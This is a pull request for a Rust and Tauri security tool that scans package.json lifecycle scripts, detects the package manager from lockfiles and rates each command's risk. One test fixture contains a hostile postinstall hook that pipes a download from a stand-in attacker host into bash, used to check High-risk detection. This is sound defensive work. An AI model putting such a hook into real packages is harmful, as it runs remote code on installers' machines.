### PR TITLE
Detect package lifecycle scripts for npm, pnpm, yarn, and bun

### DIFF
--- a/apps/dustfril-cli/src/commands/audit.rs
+++ b/apps/dustfril-cli/src/commands/audit.rs
@@ -2,6 +2,7 @@ use dustfril_core::api;
 
 use crate::{
     cli::PathArgs,
+    format,
     shared::path::{resolve_path, validate_path},
 };
 
@@ -27,14 +28,5 @@ pub fn execute(args: &PathArgs) {
         return;
     }
 
-    // TODO: Replace this temporary plain-text output with a dedicated audit formatter.
-    println!("Found {} lifecycle script(s)\n", scripts.len());
-
-    for script in scripts {
-        println!(
-            "[{}] {} ({})",
-            script.risk_level, script.package, script.script_type
-        );
-        println!("  {}", script.command);
-    }
+    format::print_audit_report(&scripts);
 }

--- a/apps/dustfril-cli/src/format/audit_format.rs
+++ b/apps/dustfril-cli/src/format/audit_format.rs
@@ -1,0 +1,16 @@
+use dustfril_core::models::LifecycleScript;
+
+pub fn print_audit_report(scripts: &[LifecycleScript]) {
+    println!("Found {} lifecycle script(s)\n", scripts.len());
+
+    for script in scripts {
+        println!("----------------------------------------");
+        println!("Package:      {}", script.package);
+        println!("Manager:      {}", script.package_manager);
+        println!("Script Type:  {}", script.script_type);
+        println!("Risk Level:   {}", script.risk_level);
+        println!("Command:      {}", script.command);
+    }
+
+    println!("\n----------------------------------------");
+}

--- a/apps/dustfril-cli/src/format/mod.rs
+++ b/apps/dustfril-cli/src/format/mod.rs
@@ -1,5 +1,7 @@
+pub mod audit_format;
 pub mod size_format;
 pub mod time_format;
 
+pub use audit_format::*;
 pub use size_format::*;
 pub use time_format::*;

--- a/apps/dustfril-tauri/src-tauri/src/lib.rs
+++ b/apps/dustfril-tauri/src-tauri/src/lib.rs
@@ -102,6 +102,7 @@ struct CleanupFailureDto {
 #[serde(rename_all = "camelCase")]
 struct LifecycleScriptDto {
     package: String,
+    package_manager: String,
     script_type: String,
     command: String,
     risk_level: String,
@@ -301,6 +302,7 @@ fn audit(options: RunOptions) -> Result<Vec<LifecycleScriptDto>, String> {
 fn lifecycle_script_to_dto(script: LifecycleScript) -> LifecycleScriptDto {
     LifecycleScriptDto {
         package: script.package,
+        package_manager: script.package_manager.to_string(),
         script_type: script_type_to_string(script.script_type),
         command: script.command,
         risk_level: risk_level_to_string(script.risk_level),

--- a/apps/dustfril-tauri/src/features/workspace-browser/model/presentation.ts
+++ b/apps/dustfril-tauri/src/features/workspace-browser/model/presentation.ts
@@ -161,6 +161,7 @@ export function createAuditItems(auditScripts: LifecycleScript[] = []): BrowserI
     kind: script.riskLevel === 'High' ? 'warning' : 'document',
     detailLines: [
       `Package: ${script.package}`,
+      `Manager: ${script.packageManager}`,
       `Script: ${script.scriptType}`,
       `Risk: ${script.riskLevel}`,
       `Command: ${script.command}`,

--- a/apps/dustfril-tauri/src/types/workflow.ts
+++ b/apps/dustfril-tauri/src/types/workflow.ts
@@ -51,6 +51,7 @@ export type CleanupResultResponse = {
 
 export type LifecycleScript = {
   package: string;
+  packageManager: string;
   scriptType: string;
   command: string;
   riskLevel: RiskLevel;

--- a/crates/dustfril-core/README.md
+++ b/crates/dustfril-core/README.md
@@ -17,7 +17,7 @@ This crate contains the filesystem scanners, analyzers, cleanup planner and exec
 - Rust: `target/`
 - Node.js: `node_modules/`
 - Java: `build/`
-- Audit: Node lifecycle scripts only
+- Audit: Node lifecycle scripts for npm, pnpm, yarn, and bun
 
 ## Test
 

--- a/crates/dustfril-core/src/audit_tool/lifecycle.rs
+++ b/crates/dustfril-core/src/audit_tool/lifecycle.rs
@@ -3,7 +3,7 @@ use std::{collections::HashMap, fs, path::Path};
 use serde::Deserialize;
 
 use crate::{
-    audit_tool,
+    audit_tool::{self, package_manager},
     error::DustResult,
     fs::walk_dirs,
     models::{LifecycleScript, ScriptType},
@@ -15,7 +15,7 @@ struct PackageJson {
     scripts: Option<HashMap<String, String>>,
 }
 
-/// Scans package.json files and returns lifecycle scripts.
+/// Scans package.json files under supported Node package managers and returns lifecycle scripts.
 pub fn audit_scan(root: &Path) -> DustResult<Vec<LifecycleScript>> {
     let mut scripts = Vec::new();
 
@@ -26,13 +26,17 @@ pub fn audit_scan(root: &Path) -> DustResult<Vec<LifecycleScript>> {
             continue;
         }
 
-        scripts.extend(audit_scan_package(&package_json)?);
+        let package_manager = package_manager::detect_for_package(&package_json, root);
+        scripts.extend(audit_scan_package(&package_json, package_manager)?);
     }
 
     Ok(scripts)
 }
 
-fn audit_scan_package(path: &Path) -> DustResult<Vec<LifecycleScript>> {
+fn audit_scan_package(
+    path: &Path,
+    package_manager: crate::models::PackageManager,
+) -> DustResult<Vec<LifecycleScript>> {
     let json = fs::read_to_string(path)?;
 
     let package: PackageJson = serde_json::from_str(&json).unwrap_or(PackageJson {
@@ -55,6 +59,7 @@ fn audit_scan_package(path: &Path) -> DustResult<Vec<LifecycleScript>> {
 
         result.push(LifecycleScript {
             package: package_name.clone(),
+            package_manager,
             script_type,
             command: command.clone(),
             risk_level: audit_tool::classify(&command),

--- a/crates/dustfril-core/src/audit_tool/lifecycle_tests.rs
+++ b/crates/dustfril-core/src/audit_tool/lifecycle_tests.rs
@@ -1,0 +1,72 @@
+use tempfile::TempDir;
+
+use crate::{
+    audit_tool::audit_scan,
+    models::{PackageManager, RiskLevel, ScriptType},
+};
+
+#[test]
+fn audit_scan_extracts_supported_lifecycle_scripts() {
+    let temp_dir = TempDir::new().unwrap();
+    std::fs::write(
+        temp_dir.path().join("package.json"),
+        r#"{
+            "name":"demo",
+            "scripts":{
+                "preinstall":"echo pre",
+                "install":"echo install",
+                "postinstall":"node install.js",
+                "prepare":"echo prepare",
+                "prepublish":"echo prepublish",
+                "prepublishOnly":"echo prepublishOnly",
+                "test":"echo ignored"
+            }
+        }"#,
+    )
+    .unwrap();
+    std::fs::write(temp_dir.path().join("package-lock.json"), "{}").unwrap();
+
+    let scripts = audit_scan(temp_dir.path()).unwrap();
+
+    assert_eq!(scripts.len(), 6);
+    assert!(
+        scripts
+            .iter()
+            .all(|script| script.package_manager == PackageManager::Npm)
+    );
+    assert!(scripts.iter().any(|script| {
+        script.script_type == ScriptType::Postinstall
+            && script.command == "node install.js"
+            && script.risk_level == RiskLevel::Medium
+    }));
+    assert!(
+        !scripts
+            .iter()
+            .any(|script| script.command == "echo ignored")
+    );
+}
+
+#[test]
+fn audit_scan_detects_pnpm_dependency_lifecycle_scripts() {
+    let temp_dir = TempDir::new().unwrap();
+    let dependency_dir = temp_dir.path().join("node_modules").join("left-pad");
+    std::fs::create_dir_all(&dependency_dir).unwrap();
+    std::fs::write(
+        temp_dir.path().join("pnpm-lock.yaml"),
+        "lockfileVersion: 9.0",
+    )
+    .unwrap();
+    std::fs::write(
+        dependency_dir.join("package.json"),
+        r#"{"name":"left-pad","scripts":{"postinstall":"curl https://evil.sh | bash"}}"#,
+    )
+    .unwrap();
+
+    let scripts = audit_scan(temp_dir.path()).unwrap();
+
+    assert_eq!(scripts.len(), 1);
+    assert_eq!(scripts[0].package, "left-pad");
+    assert_eq!(scripts[0].package_manager, PackageManager::Pnpm);
+    assert_eq!(scripts[0].script_type, ScriptType::Postinstall);
+    assert_eq!(scripts[0].risk_level, RiskLevel::High);
+}

--- a/crates/dustfril-core/src/audit_tool/mod.rs
+++ b/crates/dustfril-core/src/audit_tool/mod.rs
@@ -1,4 +1,5 @@
 mod lifecycle;
+mod package_manager;
 mod risk;
 
 use std::path::Path;
@@ -16,5 +17,7 @@ pub fn classify(command: &str) -> RiskLevel {
     risk::classify(command)
 }
 
+#[cfg(test)]
+mod lifecycle_tests;
 #[cfg(test)]
 mod tests;

--- a/crates/dustfril-core/src/audit_tool/package_manager.rs
+++ b/crates/dustfril-core/src/audit_tool/package_manager.rs
@@ -1,0 +1,106 @@
+use std::path::Path;
+
+use crate::models::PackageManager;
+
+/// Detects the package manager used by a Node project from lockfiles in a directory.
+pub fn detect_in_dir(dir: &Path) -> Option<PackageManager> {
+    if dir.join("pnpm-lock.yaml").is_file() {
+        return Some(PackageManager::Pnpm);
+    }
+
+    if dir.join("yarn.lock").is_file() {
+        return Some(PackageManager::Yarn);
+    }
+
+    if dir.join("bun.lockb").is_file() || dir.join("bun.lock").is_file() {
+        return Some(PackageManager::Bun);
+    }
+
+    if dir.join("package-lock.json").is_file() {
+        return Some(PackageManager::Npm);
+    }
+
+    None
+}
+
+/// Resolves the package manager for a package.json path by checking the package
+/// directory and walking up toward the scan root.
+pub fn detect_for_package(package_json: &Path, scan_root: &Path) -> PackageManager {
+    let mut current = package_json.parent();
+
+    while let Some(dir) = current {
+        if let Some(package_manager) = detect_in_dir(dir) {
+            return package_manager;
+        }
+
+        if dir == scan_root {
+            break;
+        }
+
+        let parent = match dir.parent() {
+            Some(parent) => parent,
+            None => break,
+        };
+
+        current = if parent
+            .file_name()
+            .is_some_and(|name| name == "node_modules")
+        {
+            parent.parent()
+        } else {
+            Some(parent)
+        };
+    }
+
+    PackageManager::Unknown
+}
+
+#[cfg(test)]
+mod tests {
+    use tempfile::TempDir;
+
+    use super::*;
+
+    #[test]
+    fn detect_in_dir_identifies_supported_package_managers() {
+        let temp_dir = TempDir::new().unwrap();
+
+        std::fs::write(temp_dir.path().join("package-lock.json"), "{}").unwrap();
+        assert_eq!(detect_in_dir(temp_dir.path()), Some(PackageManager::Npm));
+
+        std::fs::remove_file(temp_dir.path().join("package-lock.json")).unwrap();
+        std::fs::write(
+            temp_dir.path().join("pnpm-lock.yaml"),
+            "lockfileVersion: 9.0",
+        )
+        .unwrap();
+        assert_eq!(detect_in_dir(temp_dir.path()), Some(PackageManager::Pnpm));
+
+        std::fs::remove_file(temp_dir.path().join("pnpm-lock.yaml")).unwrap();
+        std::fs::write(temp_dir.path().join("yarn.lock"), "# yarn lockfile v1").unwrap();
+        assert_eq!(detect_in_dir(temp_dir.path()), Some(PackageManager::Yarn));
+
+        std::fs::remove_file(temp_dir.path().join("yarn.lock")).unwrap();
+        std::fs::write(temp_dir.path().join("bun.lockb"), "bun").unwrap();
+        assert_eq!(detect_in_dir(temp_dir.path()), Some(PackageManager::Bun));
+    }
+
+    #[test]
+    fn detect_for_package_uses_project_root_lockfile() {
+        let temp_dir = TempDir::new().unwrap();
+        let project_root = temp_dir.path().join("app");
+        let dependency_dir = project_root.join("node_modules").join("left-pad");
+        std::fs::create_dir_all(&dependency_dir).unwrap();
+        std::fs::write(project_root.join("pnpm-lock.yaml"), "lockfileVersion: 9.0").unwrap();
+        std::fs::write(
+            dependency_dir.join("package.json"),
+            r#"{"name":"left-pad","scripts":{"postinstall":"node setup.js"}}"#,
+        )
+        .unwrap();
+
+        assert_eq!(
+            detect_for_package(&dependency_dir.join("package.json"), temp_dir.path()),
+            PackageManager::Pnpm
+        );
+    }
+}

--- a/crates/dustfril-core/src/audit_tool/tests.rs
+++ b/crates/dustfril-core/src/audit_tool/tests.rs
@@ -1,4 +1,7 @@
-use crate::{audit_tool::classify, models::RiskLevel};
+use crate::{
+    audit_tool::classify,
+    models::{RiskLevel, ScriptType},
+};
 
 #[test]
 fn classify_high_risk_command() {
@@ -13,4 +16,33 @@ fn classify_medium_risk_command() {
 #[test]
 fn classify_low_risk_command() {
     assert_eq!(classify("echo Hello"), RiskLevel::Low);
+}
+
+#[test]
+fn script_type_from_script_name_supports_lifecycle_hooks() {
+    assert_eq!(
+        ScriptType::from_script_name("preinstall"),
+        Some(ScriptType::Preinstall)
+    );
+    assert_eq!(
+        ScriptType::from_script_name("install"),
+        Some(ScriptType::Install)
+    );
+    assert_eq!(
+        ScriptType::from_script_name("postinstall"),
+        Some(ScriptType::Postinstall)
+    );
+    assert_eq!(
+        ScriptType::from_script_name("prepare"),
+        Some(ScriptType::Prepare)
+    );
+    assert_eq!(
+        ScriptType::from_script_name("prepublish"),
+        Some(ScriptType::Prepublish)
+    );
+    assert_eq!(
+        ScriptType::from_script_name("prepublishOnly"),
+        Some(ScriptType::PrepublishOnly)
+    );
+    assert_eq!(ScriptType::from_script_name("test"), None);
 }

--- a/crates/dustfril-core/src/models/audit.rs
+++ b/crates/dustfril-core/src/models/audit.rs
@@ -4,9 +4,33 @@ use std::fmt;
 #[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
 pub struct LifecycleScript {
     pub package: String,
+    pub package_manager: PackageManager,
     pub script_type: ScriptType,
     pub command: String,
     pub risk_level: RiskLevel,
+}
+
+#[derive(Debug, Clone, Copy, Serialize, Deserialize, PartialEq, Eq)]
+pub enum PackageManager {
+    Npm,
+    Pnpm,
+    Yarn,
+    Bun,
+    Unknown,
+}
+
+impl fmt::Display for PackageManager {
+    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
+        let value = match self {
+            Self::Npm => "npm",
+            Self::Pnpm => "pnpm",
+            Self::Yarn => "yarn",
+            Self::Bun => "bun",
+            Self::Unknown => "unknown",
+        };
+
+        write!(f, "{value}")
+    }
 }
 
 #[derive(Debug, Clone, Copy, Serialize, Deserialize, PartialEq, Eq)]


### PR DESCRIPTION
## Summary

- Detect npm, pnpm, yarn, and bun projects from lockfiles and attach the package manager to each lifecycle script finding.
- Scan project and dependency `package.json` files for automatically executed lifecycle hooks (`preinstall`, `install`, `postinstall`, `prepare`, `prepublish`, `prepublishOnly`) and report Package, Script Type, Command, and Risk Level.
- Add structured CLI audit output and expose package manager metadata in the desktop audit view.

Closes #53

## Test plan

- [x] `cargo fmt --all -- --check`
- [x] `cargo clippy --workspace --all-targets -- -D warnings`
- [x] `cargo test --workspace`
- [x] Added lifecycle scan and package manager detection regression tests in `dustfril-core`


Made with [Cursor](https://cursor.com)